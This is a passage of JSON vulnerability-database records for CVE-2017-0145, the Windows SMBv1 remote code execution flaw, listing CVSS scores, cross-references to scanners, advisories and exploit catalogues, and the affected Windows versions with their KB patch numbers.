["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4014077", "KB4012213", "KB3210721", "KB3177186", "KB3205401", "KB4012215", "KB3210720", "KB4012216", "KB4013198", "KB4012214", "KB4013429", "KB3205409", "KB3212646", "KB4012212", "KB4012606", "KB3213986", "KBMS16-110, 3187754", "KB4012598", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:51:36", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T04:46:25", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3210721", "KB4012214", "KB3205401", "KB3210720", "KB4012212", "KB4012213", "KB4013198", "KB4012216", "KB3212646", "KB4012598", "KB4012215", "KB4014077", "KB3177186", "KB4012606", "KB3213986", "KB3205409", "KB4013429", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:46:25", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T10:52:46", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4013198", "KB4012598", "KB4014077", "KB4012606", "KB3210720", "KB3210721", "KB4012214", "KB3177186", "KB3212646", "KB4012216", "KB4012215", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB3205401", "KB4013429", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", 